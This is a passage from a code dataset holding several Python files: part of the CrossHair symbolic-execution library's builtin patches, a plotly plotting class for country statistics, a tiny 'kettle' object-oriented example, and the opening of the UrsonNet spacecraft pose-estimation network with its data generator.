https://docs.python.org/3/reference/datamodel.html#special-method-lookup\n return type(obj).__hash__(obj)\n else:\n return _TRUE_BUILTINS.hash(obj)\n\n#def sum(i: Iterable[_T]) -> Union[_T, int]:\n# '''\n# post[]: _ == 0 or len(i) > 0\n# '''\n# return _TRUE_BUILTINS.sum(i)\n\n# def print(*a: object, **kw: Any) -> None:\n# '''\n# post: True\n# '''\n# _TRUE_BUILTINS.print(*a, **kw)\n\n\ndef _repr(arg: object) -> str:\n '''\n post[]: True\n 
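    (In these CrossHair contracts, `_` denotes the function's return value,
    so a bare `post[]: True` is a postcondition that always holds.)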
'''\n return _TRUE_BUILTINS.repr(arg)\n\ndef _list_index(self, value, start=0, stop=9223372036854775807):\n return self.index(value, realize(start), realize(stop))\n\n\n@functools.singledispatch\ndef _max(*values, key=lambda x: x, default=_MISSING):\n return _max_iter(values, key=key, default=default)\n\n\n@_max.register(collections.Iterable)\ndef _max_iter(values: Iterable[_T], *, key: Callable = lambda x: x, default: Union[_Missing, _VT] = _MISSING) -> _T:\n '''\n pre: bool(values) or default is not _MISSING\n post[]::\n (_ in values) if default is _MISSING else True\n ((_ in values) or (_ is default)) if default is not _MISSING else True\n '''\n kw = {} if default is _MISSING else {'default': default}\n return _TRUE_BUILTINS.max(values, key=key, **kw)\n\n\n@functools.singledispatch\ndef _min(*values, key=lambda x: x, default=_MISSING):\n return _min_iter(values, key=key, default=default)\n\n\n@_min.register(collections.Iterable)\ndef _min_iter(values: Iterable[_T], *, key: Callable = lambda x: x, default: Union[_Missing, _VT] = _MISSING) -> _T:\n '''\n pre: bool(values) or default is not _MISSING\n post[]::\n (_ in values) if default is _MISSING else True\n ((_ in values) or (_ is default)) if default is not _MISSING else True\n '''\n kw = {} if default is _MISSING else {'default': default}\n return _TRUE_BUILTINS.min(values, key=key, **kw)\n\n\n#\n# Registrations\n#\n\ndef make_registrations():\n\n register_type(Union, make_union_choice)\n\n # Types modeled in the SMT solver:\n\n register_type(type(None), lambda *a: None)\n register_type(bool, make_optional_smt(SmtBool))\n register_type(int, make_optional_smt(SmtInt))\n register_type(float, make_optional_smt(SmtFloat))\n register_type(str, make_optional_smt(SmtStr))\n register_type(list, make_optional_smt(SmtList))\n register_type(dict, make_dictionary)\n register_type(tuple, make_tuple)\n register_type(set, make_optional_smt(SmtMutableSet))\n register_type(frozenset, make_optional_smt(SmtFrozenSet))\n register_type(type, make_optional_smt(SmtType))\n register_type(collections.abc.Callable, make_optional_smt(SmtCallable))\n\n # Most types are not directly modeled in the solver, rather they are built\n # on top of the modeled types. 
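    # For instance (see the registrations just below), a symbolic `complex`
    # is assembled from two symbolic floats, and a `slice` from three
    # symbolic Optional[int] values; the `p(...)` creator callback
    # recursively builds a proxy of whatever type it is handed.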
Such types are enumerated here:\n \n register_type(object, lambda p: SmtObject(p.space, p.pytype, p.varname))\n register_type(complex, lambda p: complex(p(float), p(float)))\n register_type(slice, lambda p: slice(p(Optional[int]), p(Optional[int]), p(Optional[int])))\n register_type(NoReturn, make_raiser(IgnoreAttempt, 'Attempted to short circuit a NoReturn function')) # type: ignore\n \n # AsyncContextManager, lambda p: p(contextlib.AbstractAsyncContextManager),\n # AsyncGenerator: ,\n # AsyncIterable,\n # AsyncIterator,\n # Awaitable,\n # Coroutine: (handled via typeshed)\n # Generator: (handled via typeshed)\n \n register_type(NamedTuple, lambda p, *t: p(Tuple.__getitem__(tuple(t))))\n \n register_type(re.Pattern, lambda p, t=None: p(re.compile)) # type: ignore\n register_type(re.Match, lambda p, t=None: p(re.match)) # type: ignore\n \n # Text: (elsewhere - identical to str)\n register_type(bytes, lambda p: p(ByteString))\n register_type(bytearray, lambda p: p(ByteString))\n register_type(memoryview, lambda p: p(ByteString))\n # AnyStr, (it's a type var)\n \n register_type(typing.BinaryIO, lambda p: io.BytesIO(p(ByteString)))\n # TODO: handle Any/AnyStr with a custom class that accepts str/bytes interchangably?:\n register_type(typing.IO, lambda p, t=Any: p(BinaryIO) if t == 'bytes' else p(TextIO))\n # TODO: StringIO (and BytesIO) won't accept SmtStr writes.\n # Consider clean symbolic implementations of these.\n register_type(typing.TextIO, lambda p: io.StringIO(str(p(str))))\n \n register_type(SupportsAbs, lambda p: p(int))\n register_type(SupportsFloat, lambda p: p(float))\n register_type(SupportsInt, lambda p: p(int))\n register_type(SupportsRound, lambda p: p(float))\n register_type(SupportsBytes, lambda p: p(ByteString))\n register_type(SupportsComplex, lambda p: p(complex))\n\n\n # Patches\n\n register_patch(orig_builtins, _len, 'len')\n register_patch(orig_builtins, _sorted, 'sorted')\n register_patch(orig_builtins, _issubclass, 'issubclass')\n register_patch(orig_builtins, _isinstance, 'isinstance')\n register_patch(orig_builtins, _implies, 'implies')\n register_patch(orig_builtins, _hash, 'hash')\n register_patch(orig_builtins, _repr, 'repr')\n register_patch(orig_builtins, _max, 'max')\n register_patch(orig_builtins, _min, 'min')\n\n # Patches on str\n for name in [\n 'center',\n 'count',\n 'encode',\n 'endswith',\n 'expandtabs',\n 'find',\n 'format', # TODO: shallow realization likely isn't sufficient\n 'format_map',\n 'index',\n 'ljust',\n 'lstrip',\n 'partition',\n 'replace',\n 'rfind',\n 'rindex',\n 'rjust',\n 'rpartition',\n 'rsplit',\n 'rstrip',\n 'split',\n 'splitlines',\n 'startswith',\n 'strip',\n 'translate',\n 'zfill',\n ]:\n orig_impl = getattr(orig_builtins.str, name)\n register_patch(orig_builtins.str, with_realized_args(orig_impl), name)\n\n # Patches on list\n register_patch(orig_builtins.list, _list_index, 'index')\n","sub_path":"crosshair/libimpl/builtinslib.py","file_name":"builtinslib.py","file_ext":"py","file_size_in_byte":63546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253450447","text":"import pandas as pd\nimport numpy as np\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nimport plotly \nplotly.offline.init_notebook_mode()\nfrom plotly import tools\nimport matplotlib.pyplot as plt\n\n'''\nThis module contains a class defined by us called plot\nClass plot contains 9 functions. 
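An illustrative (hypothetical) usage, assuming a DataFrame indexed by year
with one column per country, which is the layout the methods below expect:

    import pandas as pd
    df = pd.DataFrame({'China': [8.0, 9.5], 'India': [5.5, 7.1]},
                      index=[2000, 2010])
    p = plot(df, country=['China', 'India'], year=[2000, 2010])
    p.bar_plot()  # one group of bars per country, one bar per year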
We study through plot.ly website for use of them.\nEach function returns a plot according to feature, countries, years, and graph types selected by the user.\n'''\nclass plot():\n '''\n Initiate attributes \n df is a dataframe of feature which is selected by the user\n country is a list of countries selected by the user\n year is a list of years selected by the user\n '''\n def __init__(self,df,country,year):\n self.df = df\n self.country = country\n self.year = year\n \n '''\n Function time_series_plot returns a time-series plot\n for one country or several countries in a selected year\n '''\n def time_series_plot(self):\n specs = [[{}]]*len(self.country)\n fig = tools.make_subplots(rows=len(self.country), cols=1, specs=specs,\n shared_xaxes=True, shared_yaxes=True,\n vertical_spacing=0.001)\n \n for i in range(0,len(self.country)):\n trace = go.Scatter(x=self.df.index, y=self.df[self.country[i]],name = self.country[i])\n fig.append_trace(trace, len(self.country)-i, 1)\n\n layout = dict(\n title = 'Time Series Plot for Countries Selected' ,\n xaxis=dict(\n rangeslider=dict(),\n type='year'\n )\n )\n fig['layout'].update(layout)\n plotly.offline.iplot(fig)\n #https://plot.ly/python/time-series/ \n '''\n Function bar_plot returns a bar plot for countries in selected years\n '''\n def bar_plot(self):\n data = []\n for i in range(0,len(self.year)):\n trace = go.Bar(\n x=self.country,\n y=self.df.loc[self.year[i]][self.country],\n name = self.year[i]\n )\n data.append(trace)\n layout = go.Layout(\n title = 'Bar Plot for Countries Selected in'+str(self.year),\n xaxis=dict(tickangle=-45),\n barmode='group',\n )\n\n fig = go.Figure(data=data, layout=layout)\n plotly.offline.iplot(fig)\n \n '''\n Function scatter_plot returns a scatter plot\n '''\n def scatter_plot(self):\n data = []\n for i in range(0,len(self.country)):\n trace = go.Scatter(\n x=self.df[self.country[i]],\n y=self.df.loc[self.year][self.country[i]],\n name = self.country[i],\n mode = 'markers',\n marker = dict(\n size = 10,\n line = dict(\n width = 2,\n color = 'rgb(0, 0, 0)'\n )\n )\n )\n data.append(trace)\n layout = dict(title = 'Scatter Plot for Countries Selected in'+str(self.year),\n yaxis = dict(zeroline = False),\n xaxis = dict(zeroline = False)\n )\n\n fig = go.Figure(data = data, layout=layout)\n plotly.offline.iplot(fig)\n \n '''histogram'''\n def histogram(self):\n x0 = self.df.values.flatten()\n trace = go.Histogram(\n x=x0,\n histnorm='probability',\n opacity = 0.75\n )\n layout = dict(title = 'Histogram for Feature Selected',\n yaxis = dict(zeroline = False),\n xaxis = dict(zeroline = False)\n )\n data = [trace]\n fig = go.Figure(data=data, layout=layout)\n plotly.offline.iplot(fig)\n \n def boxplot_year(self): \n data = []\n for i in range(0,len(self.year)):\n trace = go.Box(y=self.df.loc[self.year[i]],name = self.year[i])\n data.append(trace)\n layout = dict(\n title='Boxplot according to Years',\n )\n fig = go.Figure(data = data, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Function\n ''' \n def boxplot_country(self):\n data = []\n for i in range(0,len(self.country)):\n trace = go.Box(y=self.df[self.country[i]],name = self.country[i])\n data.append(trace)\n layout = dict(\n title='Boxplot according to Countries',\n )\n fig = go.Figure(data = data, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Function heatmap returns a heatmap, whose y-axis is selected years and x-axis is selected countries\n ''' \n def heatmap(self):\n z = []\n for i in range(0,len(self.year)):\n data = []\n for j in 
range(0,len(self.country)):\n data.append(self.df.loc[self.year[i]][self.country[j]])\n z.append(data)\n \n data1 = [\n go.Heatmap(\n z=z,\n x=self.country,\n y=self.year\n )\n ]\n layout = dict(\n title='Heatmap for Selected Countries and Years',\n )\n fig = go.Figure(data = data1, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Reference: https://plot.ly/python/heatmaps/\n Function choropleth returns a heatmap of one-year feature for selected countries\n ''' \n def choropleth(self):\n layout = dict(\n title = 'Choropleth Map',\n geo = dict(\n showframe = False,\n showcoastlines = False,\n projection = dict(\n type = 'Mercator'\n )\n )\n )\n\n for i in range(0,len(self.year)):\n data = []\n data = [ dict(\n type = 'choropleth',\n locations = self.country,\n z = self.df.loc[self.year[0]][self.country],\n text = self.country,\n colorscale = [[0,\"rgb(5, 10, 172)\"],[0.35,\"rgb(40, 60, 190)\"],\n [0.5,\"rgb(70, 100,245)\"],\\\n [0.6,\"rgb(90, 120, 245)\"],[0.7,\"rgb(106, 137, 247)\"],\n [1,\"rgb(220, 220,220)\"]],\n autocolorscale = False,\n reversescale = True,\n marker = dict(\n line = dict (\n color = 'rgb(180,180,180)',\n width = 0.5\n )),\n colorbar = dict(\n autotick = False,\n tickprefix = '$',\n title = 'Selected Feature'),\n )]\n fig = dict(data=data, layout=layout )\n plotly.offline.iplot(fig, validate=False)\n ''' \n reference:https://plot.ly/python/choropleth-maps/\n '''\n def pie_chart(self):\n fig = plt.figure()\n ax = fig.gca()\n for i in range(0,len(self.year)):\n size = self.df.loc[self.year[i]][self.country]\n size[np.isnan(size) == True] = 0\n plt.pie(size,labels = self.country, autopct = '%1.1f%%', shadow = True, startangle = 90)\n plt.title('Pie Chart for Year'+ str(self.year[i]))\n plt.axis('equal')\n plt.show()\n #gives pie_plot","sub_path":"ls4408/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570497415","text":"class kettle(object):\n def __init__(self, make, price):\n self.make = make\n self.price = price\n self.on = False\n\n\nkenwood = kettle(\"kenwood\", 8.99)\nprint(kenwood.price)\nprint(kenwood.make)\n\nkenwood.price = 14.12\nprint(kenwood.price)\n\nhaminton = kettle(\"haminton\", 10.99)\n\nprint(haminton.price)\nprint(haminton.make)\n","sub_path":"oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"208004482","text":"\"\"\"\nThis is the main implementation of UrsonNet.\n\nDisclaimer:\nPart of this code was adapted from\nhttps://github.com/matterport/Mask_RCNN\nCopyright (c) 2017 Matterport, INC.\nLicenced under the MIT Licence\n\nTODO:\n- layer_regex replace 'fpn' and 'pose_'\n\n\"\"\"\n\nimport os\nimport random\nimport datetime\nimport re\nimport math\nimport logging\nfrom collections import OrderedDict\nimport multiprocessing\nimport numpy as np\nimport skimage.transform\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nimport keras.layers as KL\nimport keras.engine as KE\nimport keras.models as KM\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\n\nimport utils\n\n# Requires TensorFlow 1.3+ and Keras 2.0.8+.\nfrom distutils.version import LooseVersion\n\nassert LooseVersion(tf.__version__) >= LooseVersion(\"1.3\")\nassert LooseVersion(keras.__version__) >= LooseVersion('2.0.8')\n\n############################################################\n# Utility 
Functions\n############################################################\n\ndef log(text, array=None):\n \"\"\"Prints a text message. And, optionally, if a Numpy array is provided it\n prints it's shape, min, and max values.\n \"\"\"\n if array is not None:\n text = text.ljust(25)\n text += (\"shape: {:20} min: {:10.5f} max: {:10.5f} {}\".format(\n str(array.shape),\n array.min() if array.size else \"\",\n array.max() if array.size else \"\",\n array.dtype))\n print(text)\n\n\nclass BatchNorm(KL.BatchNormalization):\n \"\"\"Extends the Keras BatchNormalization class to allow a central place\n to make changes if needed.\n\n Batch normalization has a negative effect on training if batches are small\n so this layer is often frozen (via setting in Config class) and functions\n as linear layer.\n \"\"\"\n\n def call(self, inputs, training=None):\n \"\"\"\n Note about training values:\n None: Train BN layers. This is the normal mode\n False: Freeze BN layers. Good when batch size is small\n True: (don't use). Set layer in training mode even when inferencing\n \"\"\"\n return super(self.__class__, self).call(inputs, training=training)\n\n############################################################\n# Resnet Graph\n############################################################\n\n# Code adopted from:\n# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py\n\ndef identity_block(input_tensor, kernel_size, filters, stage, block,\n use_bias=True, train_bn=True):\n \"\"\"The identity_block is the block that has no conv layer at shortcut\n # Arguments\n input_tensor: input tensor\n kernel_size: defualt 3, the kernel size of middle conv layer at main path\n filters: list of integers, the nb_filters of 3 conv layer at main path\n stage: integer, current stage label, used for generating layer names\n block: 'a','b'..., current block label, used for generating layer names\n use_bias: Boolean. To use or not use a bias in conv layers.\n train_bn: Boolean. Train or freeze Batch Norm layres\n \"\"\"\n nb_filter1, nb_filter2, nb_filter3 = filters\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',\n use_bias=use_bias)(input_tensor)\n x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',\n name=conv_name_base + '2b', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',\n use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)\n\n x = KL.Add()([x, input_tensor])\n x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)\n return x\n\n\ndef conv_block(input_tensor, kernel_size, filters, stage, block,\n strides=(2, 2), use_bias=True, train_bn=True):\n \"\"\"conv_block is the block that has a conv layer at shortcut\n # Arguments\n input_tensor: input tensor\n kernel_size: default 3, the kernel size of middle conv layer at main path\n filters: list of integers, the nb_filters of 3 conv layer at main path\n stage: integer, current stage label, used for generating layer names\n block: 'a','b'..., current block label, used for generating layer names\n use_bias: Boolean. To use or not use a bias in conv layers.\n train_bn: Boolean. 
Train or freeze Batch Norm layres\n Note that from stage 3, the first conv layer at main path is with subsample=(2,2)\n And the shortcut should have subsample=(2,2) as well\n \"\"\"\n nb_filter1, nb_filter2, nb_filter3 = filters\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,\n name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)\n x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',\n name=conv_name_base + '2b', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +\n '2c', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)\n\n shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,\n name=conv_name_base + '1', use_bias=use_bias)(input_tensor)\n shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)\n\n x = KL.Add()([x, shortcut])\n x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)\n return x\n\n\ndef resnet_graph(input_image, architecture, stage5=False, train_bn=True):\n \"\"\"Build a ResNet graph.\n architecture: Can be resnet50 or resnet101\n stage5: Boolean. If False, stage5 of the network is not created\n train_bn: Boolean. Train or freeze Batch Norm layres\n \"\"\"\n assert architecture in [\"resnet50\", \"resnet101\"]\n\n # Stage 1\n x = KL.ZeroPadding2D((3, 3))(input_image)\n x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)\n x = BatchNorm(name='bn_conv1')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n # tmp\n #C1 = x = KL.Conv2D(64, (3, 3), strides=(2, 2), name='conv2')(x)\n C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding=\"same\")(x)\n # Stage 2\n x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)\n C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)\n # Stage 3\n x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)\n C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)\n # Stage 4\n x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)\n block_count = {\"resnet50\": 5, \"resnet101\": 22}[architecture]\n for i in range(block_count):\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)\n C4 = x\n # Stage 5\n if stage5:\n x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)\n C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)\n else:\n C5 = None\n return [C1, C2, C3, C4, C5]\n\n############################################################\n# Shallow Resnet\n############################################################\n\n# Code adopted from:\n# https://github.com/qubvel/classification_models/blob/master/classification_models/resnet/builder.py\n\ndef handle_block_names(stage, block):\n name_base = 'stage{}_unit{}_'.format(stage + 1, 
block + 1)\n conv_name = name_base + 'conv'\n bn_name = name_base + 'bn'\n relu_name = name_base + 'relu'\n sc_name = name_base + 'sc'\n return conv_name, bn_name, relu_name, sc_name\n\ndef residual_basic_block(input_tensor, filters, stage, block, strides=(1, 1), cut='pre', use_bias=False, train_bn=True):\n\n # get names of layers\n conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)\n\n # defining shortcut connection\n if cut == 'pre':\n shortcut = input_tensor\n elif cut == 'post':\n shortcut = KL.Conv2D(filters, (1, 1), name=sc_name, strides=strides, use_bias=use_bias)(input_tensor)\n else:\n raise ValueError('Cut type not in [\"pre\", \"post\"]')\n\n # Two 3x3 convolution layers\n x = KL.ZeroPadding2D(padding=(1, 1))(input_tensor)\n x = KL.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name + '2')(x, training=train_bn)\n x = KL.Activation('relu', name=relu_name + '1')(x)\n x = KL.ZeroPadding2D(padding=(1, 1))(x)\n x = KL.Conv2D(filters, (3, 3), name=conv_name + '2', use_bias=use_bias)(x)\n\n # add residual connection\n x = KL.Add()([x, shortcut])\n x = KL.Activation('relu', name=relu_name + '2')(x)\n return x\n\ndef resnet_shallow_graph(input_image, architecture, train_bn=True):\n '''\n\n N.b: Currently convolutions do not use the bias term (unlike the 'deeper' resnet_graph)\n to keep compatibility with pre-trained weights\n '''\n\n assert architecture in [\"resnet18\", \"resnet34\"]\n\n nr_init_filters = 64\n\n # Resnet bottom\n x = KL.ZeroPadding2D(padding=(3, 3))(input_image)\n x = KL.Conv2D(nr_init_filters, (7, 7), strides=(2, 2), name='conv0', use_bias=False)(x)\n x = BatchNorm(name='bn_conv0')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)\n\n # TODO: Allow more architectures\n if architecture == 'resnet18':\n repetitions = [2, 2, 2, 2]\n else:\n # This is fo 34 layers\n repetitions = (3, 4, 6, 3)\n\n for stage, rep in enumerate(repetitions):\n for block in range(rep):\n\n nr_filters = nr_init_filters * (2 ** stage)\n\n # first block of first stage without strides because we have maxpooling before\n if block == 0 and stage == 0:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(1, 1), cut='post', train_bn=train_bn)\n\n elif block == 0:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(2, 2),cut='post',train_bn=train_bn)\n\n else:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(1, 1), cut='pre', train_bn=train_bn)\n\n return x\n\n############################################################\n# Network Heads\n############################################################\n\ndef build_loc_graph(feature_map, config, nr_features):\n \"\"\"Builds the computation graph for location estimation on top of the Feature Network.\n Options: (1) XYZ regression (default), (2) 3D Keypoint regression and (3) classification (experimental)\n Returns: Location [batch, N]\n \"\"\"\n\n nr_fc_layers = config.NR_DENSE_LAYERS\n assert nr_fc_layers in range(3)\n\n # TODO: Move this outside the function (redundancy)\n x = KL.Reshape((nr_features,))(feature_map)\n\n for i in range(nr_fc_layers):\n intermediate_fc_layer_name = 'loc_dense_' + str(i)\n x = KL.Dense(config.BRANCH_SIZE, name =intermediate_fc_layer_name)(x)\n\n if config.TRAIN_BN:\n bn_name = 'loc_bn_' + str(i)\n x = BatchNorm(name =bn_name)(x)\n x = KL.Activation('relu')(x)\n\n if config.REGRESS_KEYPOINTS:\n k1 = KL.Dense(3, activation='linear', 
name=\"k1_final\")(x)\n k2 = KL.Dense(3, activation='linear', name=\"k2_final\")(x)\n k3 = KL.Dense(3, activation='linear', name=\"k3_final\")(x)\n loc = [k1,k2,k3]\n else:\n if config.REGRESS_LOC:\n loc = KL.Dense(3, activation='linear', name=\"loc_final\")(x)\n else:\n loc = KL.Dense(config.LOC_BINS_PER_DIM**3, activation='relu', name=\"loc_final\")(x)\n\n return loc\n\ndef build_ori_graph(feature_map, config, nr_features):\n \"\"\"Builds the computation graph for orientation estimation on top of the Feature Network.\n Options: (1) 4D -vector regression (e.g. quaternion), (2) 3D-vector regression (e.g. angle-axis) and (3) classification\n Returns: Orientation [batch, N]\n \"\"\"\n\n nr_fc_layers = config.NR_DENSE_LAYERS\n assert nr_fc_layers in range(3)\n\n # TODO: Move this outside the function (redundancy)\n x = KL.Reshape((nr_features,))(feature_map)\n\n for i in range(nr_fc_layers):\n intermediate_fc_layer_name = 'ori_dense_' + str(i)\n x = KL.Dense(config.BRANCH_SIZE, name =intermediate_fc_layer_name)(x)\n\n if config.TRAIN_BN:\n bn_name = 'ori_bn_' + str(i)\n x = BatchNorm(name =bn_name)(x)\n x = KL.Activation('relu')(x)\n\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n q = KL.Dense(4, activation='linear', name=\"ori_q\")(x)\n q = KL.Lambda(lambda x: K.l2_normalize(q, axis=-1))(q)\n else:\n q = KL.Dense(3, activation='linear', name=\"ori_final\")(x)\n else:\n q = KL.Dense(config.ORI_BINS_PER_DIM**3, activation='relu', name=\"ori_final\")(x)\n\n return q\n\n############################################################\n# Data Generator\n############################################################\n\ndef load_image_gt(dataset, config, image_id):\n \"\"\"Load an image + object pose and apply augmentation pipeline (if necessary)\n\n Returns:\n image: [height, width, n]\n shape: the original shape of the image before resizing and cropping.\n loc: [x,y,z]\n ori: orientation representation\n \"\"\"\n # Load and resize image\n image = dataset.load_image(image_id)\n\n if config.REGRESS_LOC:\n loc = dataset.load_location(image_id)\n else:\n loc = dataset.load_location_encoded(image_id)\n\n if config.REGRESS_KEYPOINTS:\n keypoints = dataset.load_keypoints(image_id)\n k1 = keypoints[0]\n k2 = keypoints[1]\n\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n ori = dataset.load_quaternion(image_id)\n elif config.ORIENTATION_PARAM == 'euler_angles':\n ori = dataset.load_euler_angles(image_id)\n elif config.ORIENTATION_PARAM == 'angle_axis':\n ori = dataset.load_angle_axis(image_id)\n else:\n ori = dataset.load_orientation_encoded(image_id)\n\n if config.SIM2REAL_AUG:\n image_gray = 0.2126*image[:,:,0]+0.7152*image[:,:,1]+0.0722*image[:,:,2]\n image[:, :, 0] = image_gray\n image[:, :, 1] = image_gray\n image[:, :, 2] = image_gray\n if np.random.rand(1) > 0.5:\n # Image Augmentation Pipeline\n aug_pipeline = iaa.Sequential([\n iaa.AdditiveGaussianNoise(scale=0.01 * 255),\n iaa.GaussianBlur(sigma=(0.0,1.5)),\n iaa.Add((-20, 20)),\n iaa.Multiply((0.5,2.0)),\n iaa.CoarseDropout([0.0, 0.03], size_percent=(0.02,0.1))\n ], random_order=True)\n\n det = aug_pipeline.to_deterministic()\n image = det.augment_image(image)\n\n\n if config.ROT_AUG or config.ROT_IMAGE_AUG:\n assert config.REGRESS_LOC\n assert config.ORIENTATION_PARAM == 'quaternion'\n\n # TODO: The 2 rotation augmentation operations are so far applied with mutual exclusion. 
Arbitrary may lead to more variation.\n\n dice = np.random.rand(1)\n\n # Camera orientation perturbation half the time\n if config.ROT_AUG and dice > 0.5:\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n image, loc, ori = utils.rotate_cam(image, loc, ori, dataset.camera.K, 20)\n k1, k2 = utils.encode_as_keypoints(ori, loc)\n else:\n ori = dataset.load_quaternion(image_id)\n image, loc, ori = utils.rotate_cam(image, loc, ori, dataset.camera.K, 20)\n\n # Update encoded orientation\n ori = utils.encode_ori_fast(ori, config.BETA, dataset.ori_histogram_map, dataset.ori_output_mask)\n\n elif config.ROT_IMAGE_AUG and dice <= 0.5:\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n image, loc, ori = utils.rotate_image(image, loc, ori, dataset.camera.K)\n k1, k2 = utils.encode_as_keypoints(ori, loc)\n else:\n ori = dataset.load_quaternion(image_id)\n image, loc, ori = utils.rotate_image(image, loc, ori, dataset.camera.K)\n\n # Update encoded orientation\n ori = utils.encode_ori_fast(ori, config.BETA, dataset.ori_histogram_map, dataset.ori_output_mask)\n\n original_shape = image.shape\n\n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n # Image meta data\n image_meta = compose_image_meta(image_id, original_shape, image.shape,\n window, scale)\n\n if config.REGRESS_KEYPOINTS:\n return image, image_meta, loc, k1.T, k2.T\n else:\n return image, image_meta, loc, ori\n\ndef data_generator(dataset, config, shuffle=True, batch_size=1):\n \"\"\"A generator that returns images and corresponding groundtruth.\n\n dataset: The Dataset object to pick data from\n config: The model config object\n shuffle: If True, shuffles the samples before every epoch\n batch_size: How many images to return in each call\n\n Returns a Python generator. Upon calling next() on it, the\n generator returns two lists, inputs and outputs. The containtes\n of the lists differs depending on the received arguments:\n inputs list:\n - images: [batch, H, W, C]\n - image_meta: [batch, (meta data)] Image details. See compose_image_meta()\n - gt_locs: [batch, N]\n - gt_oris: [batch, N]\n \"\"\"\n b = 0 # batch item index\n image_index = -1\n image_ids = np.copy(dataset.image_ids)\n error_count = 0\n\n tensor_dtype = np.float32\n # For modern GPUs\n if config.F16:\n tensor_dtype = np.float16\n\n # Keras requires a generator to run indefinately.\n while True:\n try:\n # Increment index to pick next image. 
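            # (The modulo wrap below returns image_index to 0 once every id
            # has been served; because the index starts at -1, the very
            # first iteration also lands on 0 and triggers an initial
            # shuffle.)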
